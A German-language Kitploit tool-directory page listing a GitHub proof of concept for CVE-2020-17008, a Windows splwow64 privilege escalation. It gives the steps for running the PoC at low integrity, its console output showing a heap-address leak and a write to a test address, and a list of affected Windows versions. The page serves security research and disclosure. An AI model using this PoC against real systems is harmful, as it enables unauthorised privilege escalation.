Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-17008 — CVE-2020-17008 splWOW64 Privilegienausweitung | Kitploit
Tools/GitHubGitHub/jas502n/cve-2020-17008
Privilege EscalationSchwachstellenanalyseExploitationBinary-Exploitation
GitHubjas502n/cve-2020-17008

CVE-2020-17008

CVE-2020-17008 splWOW64 Privilegienausweitung

Repository anzeigen
467vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-17008 splWOW64 Elevation of Privilege

C:\Windows\splwow64.exe

Poc From:

https://bugs.chromium.org/p/project-zero/issues/detail?id=2096

0x01 set splwow64_poc.exe Low

cd splwow64_poc\x64\Release

icacls splwow64_poc.exe /setintegritylevel L

root@kitploit:~
 /setintegritylevel [(CI)(OI)]级别将完整性 ACE 显式
        添加到所有匹配文件。要指定的级别为以下级别
        之一:
             L[ow]
             M[edium]
             H[igh]
        完整性 ACE 的继承选项可以优先于级别,但只应用于
        目录。

0x02 run splwow64_poc.exe

root@kitploit:~
splwow64_poc\x64\Release>splwow64_poc.exe

Start
ntdll = 0x7FF837980000
Init done
C:\Users\pwned\Desktop\splwow64_poc\x64\Release
C:\Users\pwned\Desktop\splwow64_poc\x64\Release\CreateDC.exe
Now's the time to hook up the debugger to splwow64.exe if you want to. Press [Enter] to continue . . .
Get port name
name: \RPC Control\UmpdProxy_2_bea57_0_2000
Create port.
Prepare 0x6A Message - OpenPrinter
PtrMsgReply: 0x0000000000AB0140
ClientView: 0x0000027F390B0000/0x0000000000AB0000, 0x0000027F390B0100: Microsoft XPS Document Writer
Writing message 0x6A success!
Cookie: 0x0
Preparing 0x6D message (to leak heap address) - DocumentEvent
Output: 0x0000000000000000, Heap Address: 0xFFFFFFFFFFFFFFC0
Preparing 0x6D message (write to 0x41414141) - DocumentEvent
Done

Betroffene Versionen

root@kitploit:~
Windows 10 Version 1607 (für x64-basierte Systeme)
Windows 10 Version 1607 (für 32-Bit-Systeme)
Windows 10 (für x64-basierte Systeme)
Windows 10 (für 32-Bit-Systeme)
Windows 10 Version 1709 (für ARM64-basierte Systeme)
Windows 10 Version 1709 (für x64-basierte Systeme)
Windows 10 Version 1709 (für 32-Bit-Systeme)
Windows 10 Version 1809 (für ARM64-basierte Systeme)
Windows 10 Version 1809 (für x64-basierte Systeme)
Windows 10 Version 1809 (für 32-Bit-Systeme)

Windows Server Version 1803 (Server Core-Installation)
Windows 10 Version 1803 (für ARM64-basierte Systeme)
Windows 10 Version 1803 (für x64-basierte Systeme)
Windows 10 Version 1803 (für 32-Bit-Systeme)

Windows Server Version 1903 (Server Core-Installation)
Windows 10 Version 1903 (für ARM64-basierte Systeme)
Windows 10 Version 1903 (für x64-basierte Systeme)
Windows 10 Version 1903 (für 32-Bit-Systeme)

Windows Server Version 1909 (Server Core-Installation)
Windows 10 Version 1909 (für ARM64-basierte Systeme)
Windows 10 Version 1909 (für x64-basierte Systeme)
Windows 10 Version 1909 (für 32-Bit-Systeme)

Windows Server Version 2004 (Server Core-Installation)
Windows 10 Version 2004 (für x64-basierte Systeme)
Windows 10 Version 2004 (für ARM64-basierte Systeme)
Windows 10 Version 2004 (für 32-Bit-Systeme)

Windows Server 2016 (Server Core-Installation)
Windows Server 2016

Windows Server 2019 (Server Core-Installation)
Windows Server 2019

Windows Server 2012
Windows Server 2012 R2 (Server Core-Installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core-Installation)

Windows RT 8.1
Windows 8.1 (für x64-basierte Systeme)
Windows 8.1 (für 32-Bit-Systeme)
Tool herunterladen